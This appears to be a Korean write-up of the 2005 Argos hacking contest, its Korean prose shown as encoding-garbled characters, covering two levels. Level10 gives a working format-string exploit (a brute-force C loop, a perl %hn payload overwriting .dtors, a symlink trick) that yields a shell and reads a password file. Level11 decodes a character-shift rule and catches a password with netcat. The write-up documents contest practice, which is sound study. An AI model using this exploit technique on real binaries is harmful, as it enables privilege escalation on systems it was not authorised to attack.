level10 ¹®Á¦ÆÄÀÏÀÌ ÀÖ½À´Ï´Ù. Áø½ÉÀ¸·Î °ÇÅõ¸¦ º÷´Ï´Ù!!
*/
level10... Âü¿©ÇϽŠ¸ðµç ºÐµéÀÌ Á¦ÀÏ °íÀüÇϽŠ¹®Á¦ÀÎ°Í °°½À´Ï´Ù.
¾ÆÁ÷ Fedora FSB¿¡ ´ëÇؼ± °ø°³µÈ ¹®¼°¡ ¾ø´Â°É·Î ¾Ë°í ÀÖ½À´Ï´Ù.
°ø°Ý¿¡ ´ëÇÑ ½Ã³ñ½Ã½º¸¦ °£´ÜÈ÷ ¾Ë¾Æº¸°Ú½À´Ï´Ù.
1/ .dtors °ø·«
2/ exec*ÇÔ¼ö±º library·Î .dtors¸¦ µ¤¾î¾²±â
3/ ÁÖ¼Ò¿¡ ·çÇÁ¸¦ µ¹¸ç 1¾¿ Áõ°¡Çϵµ·Ï ÄÚµù
±×·³ °£·«ÇÑ exploitÀ» º¸°Ú½À´Ï´Ù.
- brute_ffsb.c -
#include
#include
int main( void )
{
int i=34562;
char cmd[1024];
while(1)
{
sprintf(cmd,"strace /home/guest2/level10_vul `perl -e 'print \"AAAA\\xa6\\x94\\x04\\x08CCCC\\xa4\\x94\\x04\\x08\",\"%%08x\"x7,\"%%86c%%hn%%%dc%%hn\",\"BB\"'`",i);
system( cmd );
printf ("%s",cmd);
i++;
getchar();
}
}
execve system_callÈ®ÀÎÀ» À§ÇÏ¿© strace¸¦ »ç¿ëÇÏ¿´½À´Ï´Ù.
brute_ffsb¸¦ »ç¿ëÇÏ¿© execve°¡ ½ÇÇàÇÏ´Â ÆÄÀÏ °æ·Î°¡ Á¸ÀçÇÏ°í, -1À» ¸®ÅÏ(ÇØ´ç°æ·Î¿¡ ÆÄÀÏÀÌ ¾øÀ½)Çϴ°ÍÀ» ÀÌ¿ëÇÏ¿©
½©À» ¾òÀ» ¼ö ÀÖ½À´Ï´Ù.
°æ·Î¸¦ ¸µÅ© ½ÃÅ°±â À§ÇØ °£´ÜÇÑ ÇÁ·Î±×·¥À» ÀÌ¿ëÇÏ°Ú½À´Ï´Ù.
- link.c -
int main( void )
{
symlink( "./shell" , "\xA1\x64\x96\x04\x08\x8B\x10\x85\xD2\x75\xEB\xC6\x05\x68\x96\x04\x08\x01\xC9\xC3\x89\xF6\x55\x89\xE5\x83\xEC\x08\xA1\x70\x95\x04\x08\x85\xC0\x74\x19\xB8" );
}
[guest2@localhost .test]$ ../level10_vul `perl -e 'print "AAAA\x6e\x95\x04\x08CCCC\x6c\x95\x04\x08","%08x"x7,"%86c%hn%34794c%hn"'`
.
.
.
$ id
uid=505(guest2) gid=505(guest2) egid=502(level10) groups=505(guest2)
$ cat /home/guest2/level10_password
Wow..
level10 password is "is It possible st1ll?"
!!!!!!!!!!!!!!!!!! level11 - Rule_find(Sense) !!!!!!!!!!!!!!!!!!
/*
# LEVEL11 #
HINT : 168.188.130.232¿¡´Â 7979 Æ÷Æ®°¡ ¿·ÁÀÖ½À´Ï´Ù.
¹®Á¦Çª´Âµ¥ ¹®Á¦Á¡Àº ¾øÁö¸¸ °£È¤ ù ½ÇÇà(?)¿¡ ¾²·¹±â°ªÀÌ ºÙ½À´Ï´Ù.
¹«½ÃÇϼŵµ µË´Ï´Ù^^; Á˼ۿä~ ¤Ð¤Ð
±×·³.. ¿©·¯ºÐÀÇ ¼¾½º¸¦ ±â´ëÇÕ´Ï´Ù!
*/
À̹ø ¹®Á¦´Â ¹®ÀÚ/¹®ÀÚ¿À» ÀÔ·ÂÇϸé ƯÁ¤ÇÑ ±ÔÄ¢À¸·Î ¹®ÀÚ/¹®ÀÚ¿ÀÌ º¯È¯µÇ¾î¼ Ãâ·ÂµË´Ï´Ù.
±× ±ÔÄ¢À» ã¾Æ¼ AHF2005¸¦ ¹®Á¦ ¼¹ö¿¡¼ Ãâ·Â ÇØ ÁÖµµ·Ï ÇÏ¸é °ø°Ý ¼º°øÀÔ´Ï´Ù.
ÀÌ ¸®¸ðÆ® ÇÁ·Î±×·¥Àº ÀÔ·ÂµÈ ¹®ÀÚÀÇ ASCII_number-7À» ÇÏ¿© Ãâ·Â ÇØ ÁÝ´Ï´Ù.
ÀÌ´Â °£´ÜÇÑ ÄÚµùÀ¸·Î AHF2005¸¦ Ãâ·ÂÇØÁÖ´Â ¹®ÀÚ¿À» ãÀ» ¼ö ÀÖ½À´Ï´Ù.
- rule.c -
int main( void )
{
printf( "%c%c%c%c%c%c%c\n" ,'A'+7,'H'+7,'F'+7,'2'+7,'0'+7,'0'+7,'5'+7 );
}
[hkpco@ns ahf]$ gcc -o rule rule.c
[hkpco@ns ahf]$ ./rule
HOM977<
±×·³ ÀÌÁ¦ HOM977< À» ÀÔ·ÂÇØ º¸µµ·Ï ÇÏ°Ú½À´Ï´Ù.
[hkpco@ns ahf]$ telnet 168.188.130.232 7979
Trying 168.188.130.232...
Connected to 168.188.130.232.
Escape character is '^]'.
HOM977<
# Password was sent to you! :-)
Connection closed by foreign host.
Æнº¿öµå¸¦ º¸³» ÁÖ¾ú´Ù°í ÇÕ´Ï´Ù.
ƯÁ¤ Æ÷Æ®·Î º¸³» Áشٴ °ÍÀ» ÃßÃø ÇÒ ¼ö ÀÖ½À´Ï´Ù.
¾î´À Æ÷Æ®·Î º¸³»ÁÖ´ÂÁö´Â º¹ÀâÇÑ ¹æ¹ýÀÌ ¾Æ´Ñ, ¹®Á¦¿¡¼ ¸»ÇÑ´ë·Î Sense·Î Ç®¾î º¸°Ú½À´Ï´Ù.
AHF2005¸¦ º¸¾Æ¼ Æ÷Æ®´Â 2005¶ó´Â °ÍÀ» ÃßÃø ÇÒ ¼ö ÀÖ½À´Ï´Ù.
±×·³ ÀÌÁ¦ nc·Î 2005port¸¦ ´ë±â ½ÃÄѳõ°í ¹®Á¦ ¼¹ö°¡ º¸³»ÁÖ´Â Æнº¿öµå¸¦ ¹ÞÀ¸¸é µË´Ï´Ù.
* sense°¡ ¾øÀ¸½Å ºÐµéÀº snifferµîÀ» ÀÌ¿ëÇÏ¸é µË´Ï´Ù.
(terminal1)
[hkpco@localhost ~]$ telnet 168.188.130.232 7979
Trying 168.188.130.232...
Connected to 168.188.130.232 (168.188.130.232).
Escape character is '^]'.
HOM977<
# Password was sent to you! :-)
Connection closed by foreign host.
(terminal2)
[hkpco@localhost ~]$ nc -l -v -p 2005
listening on [any] 2005 ...
168.188.130.232: inverse host lookup failed: Unknown host
connect to [222.122.45.36] from (UNKNOWN) [168.188.130.232] 39052
# Level11 Password is 'DoYouHaveAGirlFriend?'
-+-+-+-+-+-+-+-+-+-+ PostScript(Èıâ) -+-+-+-+-+-+-+-+-+-+
48½Ã°£ÀÇ ±æ´Ù¸é ±ä, ª´Ù¸é ªÀº ´ëȸµ¿¾È Á¤¸» ¸¹Àº°ÍÀ» ¹è¿ì°í ÀÍÇû½À´Ï´Ù.
ƯÈ÷ Argos ´ëȸ¿¡¼´Â ´Ù¸¥ ´ëȸµéó·³ °è´Ü½Ä ¹®Á¦Ç®ÀÌ°¡ ¾Æ´Ï¶ó´Â °ÍÀÌ ÁÁ¾Ò½À´Ï´Ù.
ºÐ¸íÈ÷ ¿¹Àü¿¡ ´Ù ¾Ë¾Ò´ø°ÍÀε¥ ¸·»ó Ç®·Á°í ÇÏ´Ï Àß µÇÁö ¾Ê¾Ò°í,
±×·¡¼ Á¦ ±â¾ïÀ» ȸ»óÇÒ ¼ö ÀÖ´Â ÁÁÀº ±âȸ°¡ µÇ¾ú½À´Ï´Ù.
¹®Á¦¸¦ Ç®¸é¼ ¾þÄ¡¶ô µÚÄ¡¶ôÇÏ´Â ¼øÀ§¿¡ ½º¸±ÀÖ´Â ´ëȸ¿´½À´Ï´Ù.
±×¸®°í ¹®Á¦¸¦ ³»½Ã°í ¹ã»õ¿ö ¸ð´ÏÅ͸µ ÇϽôø ¿î¿µÁøºÐµé Á¤¸» ¼ö°íÇϼ̽À´Ï´Ù.
´Ù¾çÇÑ Á¾·ùÀÇ Àç¹ÌÀÖ´Â ¹®Á¦µéÀÌ Á¦¸Ó¸®¼ÓÀ» ½ºÃÄ°©´Ï´Ù.
¹Ì¾àÇÑ º¸°í¼ ³¡±îÁö ÀоîÁּż °¨»çµå¸®¸ç, Èı⸦ ³¡À¸·Î ¹®¼¸¦ ¸¶Ä¨´Ï´Ù.
Á¤¸» ÁÁÀº ¹®Á¦µé Á¤¸» °¨»çÇÕ´Ï´Ù!
Argos ÆÄÀÌÆÃ!!